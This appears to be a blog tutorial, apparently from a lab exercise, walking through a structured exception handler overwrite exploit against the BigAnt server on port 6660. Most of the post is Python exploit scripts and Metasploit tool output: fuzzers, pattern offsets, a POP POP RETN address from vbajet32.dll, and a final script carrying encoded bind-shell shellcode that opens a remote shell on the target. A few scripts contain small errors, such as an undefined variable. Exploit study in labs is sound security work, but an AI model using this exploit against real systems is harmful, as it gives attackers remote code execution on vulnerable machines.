Make fuzzer
#!/usr/bin/pyton
import socket
buffer = "USV "+ "\x41" * 2500 + "\r\n\r\n"
sock=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
sock.connect(("192.168.56.101",6660))
sock.send(buffer)
sock.close()
the aplication got crash but the EIP is not overwrite by buffer which we send, because it has SEH handling went overflow happend. we can check it by click on view --> SEH Cain.
to send buffer to the stack we can press shift+f9 then it can pass seh handler.
Get POP POP RETN
we need to get POP POP RETN address to overwrite SEH address in the application. so we will use "view" then "executable module"
we can see POP POP RETN and inside of module with using Ollydbg from Olly dbg click view the executable module and double click to the file vbajet32.dll. after we got inside to windows CPU of vbajet32.dll file right click searchfor than sequece of command and than filled it with POP r32, POP r32 and RETN -->Find. then we will get address in memory of vbajet32.dll
create pattern offset
to get how many byte stuck SEH, we use pattern create on metasploit. reload the character from pattern create to the buffer.
root@bt:/pentest/exploits/framework/tools# ./pattern_create.rb 2500 > Big.txt
#!/usr/bin/pyton
import socket
buffer = "USV "
buffer+= "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2Cv3Cv4Cv5Cv6Cv7Cv8Cv9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2Cy3Cy4Cy5Cy6Cy7Cy8Cy9Cz0Cz1Cz2Cz3Cz4Cz5Cz6Cz7Cz8Cz9Da0Da1Da2Da3Da4Da5Da6Da7Da8Da9Db0Db1Db2Db3Db4Db5Db6Db7Db8Db9Dc0Dc1Dc2Dc3Dc4Dc5Dc6Dc7Dc8Dc9Dd0Dd1Dd2Dd3Dd4Dd5Dd6Dd7Dd8Dd9De0De1De2De3De4De5De6De7De8De9Df0Df1Df2D" + "\r\n\r\n"
sock=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
sock.connect(("192.168.56.101",6660))
sock.send(buffer)
sock.close()
restart the Ollydbg and BigAnt server then run it again with new fuzzer, to by pass fuzzer press shift+f9. to count a number buffer we can use pattern offset.
root@bt:/pentest/exploits/framework/tools# ./pattern_offset.rb 42326742
966
now we have buffer about 966 byte to trigger SEH handle then we will put in to the fuzzer
#!/usr/bin/python
import socket
buffer ="USV "
buffer+= "\x90" * 962
buffer+= "\xcc\xcc\xcc\xcc"
buffer+= "\x41\x41\x41\x41"
buffer+= "\x90" * (2504 - len(hancur))
buffer+= "\r\n\r\n"
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect(("192.168.56.101",6660))
sock.send(buffer)
sock.close()
after that restart Ollydbg and BigAnt server, then run it with the fuzzer. BigAnt server will crash and buffer \x41 will overwrite SEH handler.
Controling CPU proses
After we get byte address as trigger of SEH now, we loaded offset address from vbajet32.dll which consist POP POP RETN to the fuzzer
#!/usr/bin/python
import socket
buffer = "USV "
buffer+= "\x90" * 962
buffer+= "\xcc\xcc\xcc\xcc"
buffer+= "\x6A\x19\x9A\x0F"
buffer+= "\x90" * (2504 - len(buffer))
buffer+= "\r\n\r\n"
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect(("192.168.56.101".6660))
sock.send(buffer)
sock.close()
before we run BIgAnt server we need to have breakpoint on SEH memory address to make sure if our exploit really pointed to the right target. then running with fuzzer.
press shift+f9 to continue the process of memory vbajet32.dll and f7 to get RETN
but we have problem now, memory space just about 4 byte, it is'nt enough to keep a shell code. show we need to relocated to the address which has bigger space. right click on 015FFD7C then "follow in dump " then "selection"
Generated Shell code
we wil use
root@bt:/pentest/exploits/framework2# ./msfweb
+----=[ Metasploit Framework Web Interface (127.0.0.1:55555)
then opened in the browser
i will use windows bind shell to generated shell code
then will reload the shell cod eto the fuzzer without the bad character. we must check the shell code, do not have any bad character. so we check it manualy with send the fuzzer row by row. after the shellcode is clear from bad character the finally fuzzer is like this.....
#!/usr/bin/python
import socket
buffer = "USV "
buffer+= "\x90" * 962
buffer+= "\xeb\x06\x90\x90"
buffer+= "\x6A\x19\x9A\x0F"
buffer+= "\x90" * 32
buffer+= ("\xdd\xc5\xb8\x4a\x27\x71\x35\x33\xc9\xb1\x51\xd9\x74\x24\xf4\x5e"
"\x83\xc6\x04\x31\x46\x13\x03\x0c\x34\x93\xc0\x6c\x50\xb8\x66\x64"
"\x5c\xc1\x86\x8b\xff\xb5\x15\x57\x24\x41\xa0\xab\xaf\x29\x2e\xab"
"\xae\x3e\xbb\x04\xa9\x4b\xe3\xba\xc8\xa0\x55\x31\xfe\xbd\x67\xab"
"\xce\x01\xfe\x9f\xb5\x42\x75\xd8\x74\x88\x7b\xe7\xb4\xe6\x70\xdc"
"\x6c\xdd\x50\x57\x68\x96\xfe\xb3\x73\x42\x66\x30\x7f\xdf\xec\x19"
"\x9c\xde\x19\xa6\xb0\x6b\x54\xc4\xec\x77\x06\xd7\xdc\x5c\xac\x5c"
"\x5d\x53\xa6\x22\x6e\x18\xc8\xbe\xc3\x95\x69\xb6\x45\xc2\xe7\x88"
"\x77\xfe\xa8\xeb\x5e\x98\x1b\x75\x37\x56\xae\x11\xb0\xeb\xfc\xbe"
"\x6a\xf3\xd1\x28\x58\xe6\x2e\x93\x0e\x06\x18\xbc\x27\x1d\xc3\xc3"
"\xd5\xd6\x0e\x96\x4f\xe5\xf1\xc8\xf8\x30\x04\x1d\x55\x95\xe8\x0b"
"\xf5\x49\x44\xe0\xa9\x2e\x39\x45\x1d\x4e\x6d\x2f\xc9\xa1\xd2\xc9"
"\x5a\x4b\x0b\x80\x35\xef\xd6\xda\x02\xb8\x19\xcc\xe7\x57\xb7\xa5"
"\x08\x87\x5f\xe1\x5a\x06\x49\xbe\x5b\x81\xda\x15\x5b\xfe\xb5\x70"
"\xea\x79\x0c\x2d\x12\x53\xdf\x85\xb8\x09\x1f\xf5\xd2\xda\x38\x8c"
"\x12\x63\x90\x91\x4d\xc1\xe1\xbd\x14\x80\x79\x5b\xb1\x37\xef\x2a"
"\xa4\xd2\xbf\x75\x0e\xef\xc9\x62\x3a\xab\x40\x8e\x8a\xf3\xa0\xe4"
"\x13\xb1\x6b\x06\xa9\x1a\xe7\x7b\x54\x5b\xac\x28\x02\xf3\xc0\xd0"
"\xe6\x12\xda\x59\x4d\xe4\xf2\xfa\x1a\x48\xaa\xad\xf5\x06\x4d\x1c"
"\xa7\x83\x1c\x61\x97\x44\x32\x44\x1d\x5b\x1f\x89\xc8\x09\x5f\x8a"
"\xc2\x32\x4f\xff\x7a\x31\xf3\x3b\xe0\x36\x22\x91\x16\x18\xa3\xe5"
"\x63\x9d\x6b\x56\x8b\x48\x6c\x88")
buffer+= "\x90" * (2504 - len(buffer))
buffer+= "\r\n\r\n"
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect(("192.168.56.101",6660))
sock.send(buffer)
sock.close()
runing the payload
to run the payload open BigAnt server than run it, after that from telnet we send the fuzzer ang connecting the telnet
Tidak ada komentar:
Posting Komentar